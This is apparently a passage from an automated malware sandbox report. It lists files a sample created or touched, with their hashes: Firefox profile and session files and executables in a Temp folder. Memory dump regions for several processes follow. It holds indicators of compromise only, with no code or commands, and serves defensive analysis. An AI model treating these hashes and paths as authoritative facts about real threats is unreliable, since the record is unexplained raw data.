                                                              b422fb8b6f90e71519023eaa83929a258e8035b20e845860bb9bd99ba2923693

                                                              SHA512

                                                              992b7a27a945f93bba3740def92fc4ee5ed299dfe7b260fa860d547712c72e77d2a3de114cb36c96252063e6fdb98d2e58d5b9a94da62e26f65791cf5956a014

                                                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\xmhyv50e.default-release\datareporting\glean\pending_pings\71da7c0b-6137-4835-83a2-cf02484d9af0

                                                              Filesize

                                                              11KB

                                                              MD5

                                                              acbadcf61a2577e9be8208e9db52294a

                                                              SHA1

                                                              3b6d8198e615084e4f2a0e1e71f2887f6c6cf4e2

                                                              SHA256

                                                              db46795f6906cbcec09effac5b06b72b1a3e9ab02f79584dcec9dfb082180586

                                                              SHA512

                                                              31d8ac59c9a63cfe015c5bc9f42f2e4ea39affe834ae420b5b592901dcb0173a54a000dfd8503ad4d43f9fce743e473efa96c327c926e09e18d9776b9493901f

                                                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\xmhyv50e.default-release\prefs-1.js

                                                              Filesize

                                                              6KB

                                                              MD5

                                                              e82d27abac36169bc74659b6d4de370f

                                                              SHA1

                                                              3eff283a07b5bea73c6fd23854eb7f0469d772f3

                                                              SHA256

                                                              944522ab4eeb2fd7429c39a016f10c859ba4ad7da1f3151f9ba8f54204c4a47b

                                                              SHA512

                                                              6fb1afb48b62a1dbe5a2245699978b753716fe664a8b6724a7b6274233c17a1ac1ee0c0401329c3ce99f323c6db4e769cd050ab4e7b53323f2a6e76b03c3cb01

                                                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\xmhyv50e.default-release\prefs-1.js

                                                              Filesize

                                                              6KB

                                                              MD5

                                                              2ebd49250fa9d43d10e7a54aa39272f5

                                                              SHA1

                                                              a60ab9082427002b174b2b0b80729d0bc12ec0c7

                                                              SHA256

                                                              e5ed04d1421cdad2e37bf5573f433e43bed9ddecb1ae172821a5821878ea0248

                                                              SHA512

                                                              f82b81cfbb29e42d15de6854a877726c49f6696444895a7510713fde948d0f4850c14db3d275cc8562ef209d3cd108af7d42ef05177fd3a3a3d354b58b2aacf4

                                                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\xmhyv50e.default-release\prefs-1.js

                                                              Filesize

                                                              6KB

                                                              MD5

                                                              01c3992cb1c2a564ec13aa1cf1a0c729

                                                              SHA1

                                                              0723aec8b511cfa43e030d3d8879aa892e9e3b68

                                                              SHA256

                                                              873d48a1e89ebcdfc6587adcc7c8f128597b8a2dbb9b1270d0528c5228983640

                                                              SHA512

                                                              d7e12f6ab2e94ce00fabaa8ed5cf52b740756817a5c4d1b47e7b938e8e88b370cb2500bb7a038c7d33dda871998a2310ec20695f0dd6fc2d28cc59839ee3e8c5

                                                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\xmhyv50e.default-release\prefs.js

                                                              Filesize

                                                              6KB

                                                              MD5

                                                              b4577427dc91798b915bbe6db0450593

                                                              SHA1

                                                              0389169211bac3fa646c116d76caef11cf3b65cc

                                                              SHA256

                                                              487660fecac1bd806510a09994129bfa0f66daac32ed423c4bb07b2c623ca3fe

                                                              SHA512

                                                              1983395d3412537cbe3b8de3dea27c9181bff94db48bf5171b029dc6a80b2191aa240053b141afba6e4e8cd5da4ded22d959e2fad02db18536ca36f4fbcea39c

                                                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\xmhyv50e.default-release\sessionstore-backups\recovery.jsonlz4

                                                              Filesize

                                                              4KB

                                                              MD5

                                                              fe352a70d0a08cb030d353d78bdb3409

                                                              SHA1

                                                              67ec9b94ac5081b4cc0c561e26314e7f4ddcbb75

                                                              SHA256

                                                              cf4ecb123c6335b34d11a9db84bc8aee30a0fada1cfbd365c048adf1e06ccb4f

                                                              SHA512

                                                              5a0a934ec74839396bcef30bd433c2cda95584af8d782ac5c88a33e2af6539a351c8e4c66fd03d0f9011c5f1c61afbd4ea17eddf5c7fb47cc6aa747ce24ff93e

                                                            • \Users\Admin\AppData\Local\TempYEVPQVNGORICJML5CO5PJXDWHCZW72LC.EXE

                                                              Filesize

                                                              1.8MB

                                                              MD5

                                                              ac89979dff72902b982fbaff22d04814

                                                              SHA1

                                                              e1aacec04a15d027395fb3b950f90b149b4f8b13

                                                              SHA256

                                                              78ed654b665c1354ddc701fa2cea28c0aef333392468161edd0f0121acad04c3

                                                              SHA512

                                                              f61234181d143999ea5692cc433a8cb97901ed93fdff6be2cb453efb16ccbcefa4143ddc8341a63b444280a001d3afb878f5fce28806ff15fe8f5f7dc0a2e779

                                                            • \Users\Admin\AppData\Local\Temp\11.exe

                                                              Filesize

                                                              88KB

                                                              MD5

                                                              89ccc29850f1881f860e9fd846865cad

                                                              SHA1

                                                              d781641be093f1ea8e3a44de0e8bcc60f3da27d0

                                                              SHA256

                                                              4d33206682d7ffc895ccf0688bd5c914e6b914ea19282d14844505057f6ed3e3

                                                              SHA512

                                                              0ed81210dc9870b2255d07ba50066376bcc08db95b095c5413ec86dd70a76034f973b3f396cafcfaf7db8b916ac6d1cbca219900bb9722cb5d5b7ea3c770a502

                                                            • memory/320-277-0x0000000001170000-0x0000000001636000-memory.dmp

                                                              Filesize

                                                              4.8MB

                                                            • memory/320-90-0x0000000001170000-0x0000000001636000-memory.dmp

                                                              Filesize

                                                              4.8MB

                                                            • memory/320-249-0x0000000006390000-0x00000000066A0000-memory.dmp

                                                              Filesize

                                                              3.1MB

                                                            • memory/320-1347-0x0000000001170000-0x0000000001636000-memory.dmp

                                                              Filesize

                                                              4.8MB

                                                            • memory/320-273-0x0000000006390000-0x00000000066A0000-memory.dmp

                                                              Filesize

                                                              3.1MB

                                                            • memory/320-271-0x0000000007690000-0x0000000007D26000-memory.dmp

                                                              Filesize

                                                              6.6MB

                                                            • memory/320-270-0x0000000007690000-0x0000000007D26000-memory.dmp

                                                              Filesize

                                                              6.6MB

                                                            • memory/320-1304-0x0000000001170000-0x0000000001636000-memory.dmp

                                                              Filesize

                                                              4.8MB

                                                            • memory/320-276-0x0000000006390000-0x00000000066A0000-memory.dmp

                                                              Filesize

                                                              3.1MB

                                                            • memory/320-250-0x0000000006390000-0x00000000066A0000-memory.dmp

                                                              Filesize

                                                              3.1MB

                                                            • memory/320-25-0x0000000001170000-0x0000000001636000-memory.dmp

                                                              Filesize

                                                              4.8MB

                                                            • memory/320-288-0x0000000007690000-0x0000000007D26000-memory.dmp

                                                              Filesize

                                                              6.6MB

                                                            • memory/320-234-0x0000000001170000-0x0000000001636000-memory.dmp

                                                              Filesize

                                                              4.8MB

                                                            • memory/320-734-0x0000000001170000-0x0000000001636000-memory.dmp

                                                              Filesize

                                                              4.8MB

                                                            • memory/320-210-0x0000000001170000-0x0000000001636000-memory.dmp

                                                              Filesize

                                                              4.8MB

                                                            • memory/320-183-0x0000000001170000-0x0000000001636000-memory.dmp

                                                              Filesize

                                                              4.8MB

                                                            • memory/320-182-0x0000000001170000-0x0000000001636000-memory.dmp

                                                              Filesize

                                                              4.8MB

                                                            • memory/320-42-0x0000000001170000-0x0000000001636000-memory.dmp

                                                              Filesize

                                                              4.8MB

                                                            • memory/320-704-0x0000000007690000-0x0000000007AF9000-memory.dmp

                                                              Filesize

                                                              4.4MB

                                                            • memory/320-89-0x0000000001170000-0x0000000001636000-memory.dmp

                                                              Filesize

                                                              4.8MB

                                                            • memory/320-689-0x0000000001170000-0x0000000001636000-memory.dmp

                                                              Filesize

                                                              4.8MB

                                                            • memory/320-420-0x0000000007690000-0x0000000007AD2000-memory.dmp

                                                              Filesize

                                                              4.3MB

                                                            • memory/320-419-0x0000000007690000-0x0000000007AD2000-memory.dmp

                                                              Filesize

                                                              4.3MB

                                                            • memory/320-587-0x0000000007690000-0x0000000007AD2000-memory.dmp

                                                              Filesize

                                                              4.3MB

                                                            • memory/320-130-0x0000000001170000-0x0000000001636000-memory.dmp

                                                              Filesize

                                                              4.8MB

                                                            • memory/320-456-0x0000000001170000-0x0000000001636000-memory.dmp

                                                              Filesize

                                                              4.8MB

                                                            • memory/320-485-0x0000000007690000-0x0000000007AF9000-memory.dmp

                                                              Filesize

                                                              4.4MB

                                                            • memory/1108-255-0x00000000009F0000-0x0000000000D00000-memory.dmp

                                                              Filesize

                                                              3.1MB

                                                            • memory/1108-252-0x00000000009F0000-0x0000000000D00000-memory.dmp

                                                              Filesize

                                                              3.1MB

                                                            • memory/1596-211-0x0000000000400000-0x0000000000681000-memory.dmp

                                                              Filesize

                                                              2.5MB

                                                            • memory/1624-421-0x0000000000300000-0x0000000000742000-memory.dmp

                                                              Filesize

                                                              4.3MB

                                                            • memory/1624-427-0x0000000000300000-0x0000000000742000-memory.dmp

                                                              Filesize

                                                              4.3MB

                                                            • memory/1624-429-0x0000000000300000-0x0000000000742000-memory.dmp

                                                              Filesize

                                                              4.3MB

                                                            • memory/1624-686-0x0000000000300000-0x0000000000742000-memory.dmp

                                                              Filesize

                                                              4.3MB

                                                            • memory/2272-133-0x0000000000D50000-0x0000000001216000-memory.dmp

                                                              Filesize

                                                              4.8MB

                                                            • memory/2272-149-0x0000000000D50000-0x0000000001216000-memory.dmp

                                                              Filesize

                                                              4.8MB

                                                            • memory/2364-275-0x00000000012C0000-0x0000000001956000-memory.dmp

                                                              Filesize

                                                              6.6MB

                                                            • memory/2364-274-0x00000000012C0000-0x0000000001956000-memory.dmp

                                                              Filesize

                                                              6.6MB

                                                            • memory/2712-11-0x0000000001350000-0x0000000001816000-memory.dmp

                                                              Filesize

                                                              4.8MB

                                                            • memory/2712-24-0x0000000001350000-0x0000000001816000-memory.dmp

                                                              Filesize

                                                              4.8MB

                                                            • memory/2712-22-0x00000000069D0000-0x0000000006E96000-memory.dmp

                                                              Filesize

                                                              4.8MB

                                                            • memory/2828-180-0x0000000000DF0000-0x00000000012B6000-memory.dmp

                                                              Filesize

                                                              4.8MB

                                                            • memory/2828-181-0x0000000000DF0000-0x00000000012B6000-memory.dmp

                                                              Filesize

                                                              4.8MB

                                                            • memory/2848-9-0x0000000006610000-0x0000000006AD6000-memory.dmp

                                                              Filesize

                                                              4.8MB

                                                            • memory/2948-179-0x00000000065B0000-0x0000000006A76000-memory.dmp

                                                              Filesize

                                                              4.8MB

                                                            • memory/3076-1340-0x00000000001B0000-0x00000000001BA000-memory.dmp

                                                              Filesize

                                                              40KB

                                                            • memory/3076-1345-0x00000000755F0000-0x0000000075637000-memory.dmp

                                                              Filesize

                                                              284KB

                                                            • memory/3076-1343-0x00000000776C0000-0x0000000077869000-memory.dmp

                                                              Filesize

                                                              1.7MB

                                                            • memory/3076-1342-0x0000000000960000-0x0000000000D60000-memory.dmp

                                                              Filesize

                                                              4.0MB

                                                            • memory/3112-1326-0x0000000000400000-0x0000000000682000-memory.dmp

                                                              Filesize

                                                              2.5MB

                                                            • memory/3144-688-0x0000000000400000-0x0000000000869000-memory.dmp

                                                              Filesize

                                                              4.4MB

                                                            • memory/3144-486-0x0000000000400000-0x0000000000869000-memory.dmp

                                                              Filesize

                                                              4.4MB

                                                            • memory/3644-1331-0x0000000003CB0000-0x0000000003D2F000-memory.dmp

                                                              Filesize

                                                              508KB

                                                            • memory/3644-1335-0x0000000003D30000-0x0000000004130000-memory.dmp

                                                              Filesize

                                                              4.0MB

                                                            • memory/3644-1336-0x0000000003D30000-0x0000000004130000-memory.dmp

                                                              Filesize

                                                              4.0MB

                                                            • memory/3644-1337-0x00000000776C0000-0x0000000077869000-memory.dmp

                                                              Filesize

                                                              1.7MB

                                                            • memory/3644-1334-0x0000000003CB0000-0x0000000003D2F000-memory.dmp

                                                              Filesize

                                                              508KB

                                                            • memory/3644-1339-0x00000000755F0000-0x0000000075637000-memory.dmp

                                                              Filesize

                                                              284KB

                                                            • memory/3644-1333-0x0000000003CB0000-0x0000000003D2F000-memory.dmp

                                                              Filesize

                                                              508KB

                                                            • memory/3644-1329-0x0000000003CB0000-0x0000000003D2F000-memory.dmp

                                                              Filesize

                                                              508KB

                                                            • memory/3644-1330-0x0000000003CB0000-0x0000000003D2F000-memory.dmp

                                                              Filesize

                                                              508KB

                                                            • memory/3644-1332-0x0000000003CB0000-0x0000000003D2F000-memory.dmp

                                                              Filesize

                                                              508KB